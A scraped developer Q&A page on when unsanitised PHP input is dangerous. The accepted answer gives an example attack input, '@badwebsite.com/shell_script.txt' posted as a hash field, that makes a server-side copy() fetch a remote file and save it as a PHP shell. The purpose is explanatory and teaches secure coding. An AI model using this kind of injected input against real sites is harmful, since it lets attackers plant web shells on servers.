doumaojin4008 2015-02-06 11:50
浏览 93
已采纳

PHP漏洞(XSS,...)>用户输入/ url注入何时实际上会造成伤害?

Hope this question is not too unspecific, so...

My question is, when do I actually have to pay attention on how I handle vulnerable variables and when do I not. E.g. it's obviously insecure to use something like ...

echo $_POST['username']; // insecure !!!

in your template. $_GET and $_SERVER variables are said to be vulnerable as well. So I'll have to sanitize them before 'using' them. But what means to 'use' in this context. Insecure would be e.g. to output them e.g. with echo, to write them unfiltered into a DB or to put them in any other open context. On the other hand, comparing them with other variables like in ...

if ($_SESSION['username'] === $_POST['username']) {};

or embedding them into a variable like ...

$file = 'http://www.example.com/users/' . $_POST['username']; // insecure !!! see Tom's answer

and then checking ...

if (file_exists($file)) {};

..., in other words keeping them in a somehow closed context is secure, isn't it? (It seems to me, that the $file-example could be considered as borderline in terms of security, but used that way, I think it's ok?). Maybe someone knows also of cases in which the distinction between open and closed context is not as clear (as I hope they are in my examples) to put attention to them.

Thank you

  • 写回答

2条回答 默认 最新

  • doubo82706 2015-02-06 12:05
    关注

    It depends on what you're going to do with that file. The username field can pass something that would point you to a file not on that website like:

    $_POST['username'] = '@not-the-site-you-want.com/bad_stuff.html';
$file = 'http://www.example.com' . $_POST['username'];

    Will resolve to http://not-the-site-you-want.com/bad_stuff.html and will still return true for file_exists($file);.

    Lets try a "real world" example of why you don't want to just inject $_POST variables and then trust the results.

    Lets say we're going to retrieve a user's picture from an online source (like this one: http://www.gravatar.com/avatar/205e460b479e2e5b48aec07710c08d50) and store it locally:

    $username = $_POST['username'];
// We expect 'hash' to contain '/avatar/205e460b479e2e5b48aec07710c08d50'
// See @SilverlightFox's comments below for more information.
$image = 'http://www.gravatar.com' . $_POST['hash'];
if (file_exists($file)) {
    // Now we have the image stored on our local system
    copy($image, 'assets/' . $username);
}

    User provides the following information:

    $_POST['username'] = 'shell_script.php';
$_POST['hash'] = '@badwebsite.com/shell_script.txt';

    You've now just uploaded a shell script to your website that will be accessible at http://www.mywebsite.com/assets/shell_script.php

    Half of security is knowing the basics and putting in restrictions. The other half is figuring out how someone could get around the restrictions you've put in place. You're code could be immune to SQL injections and XSS, but it you pass a is_admin flag as a parameter in each page request and honour it, then someone is going to find it and abuse.

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论
查看更多回答(1条)

报告相同问题?

悬赏问题

  • ¥17 pro*C预编译“闪回查询”报错SCN不能识别
  • ¥15 微信会员卡接入微信支付商户号收款
  • ¥15 如何获取烟草零售终端数据
  • ¥15 数学建模招标中位数问题
  • ¥15 phython路径名过长报错 不知道什么问题
  • ¥15 深度学习中模型转换该怎么实现
  • ¥15 HLs设计手写数字识别程序编译通不过
  • ¥15 Stata外部命令安装问题求帮助!
  • ¥15 从键盘随机输入A-H中的一串字符串,用七段数码管方法进行绘制。提交代码及运行截图。
  • ¥15 TYPCE母转母,插入认方向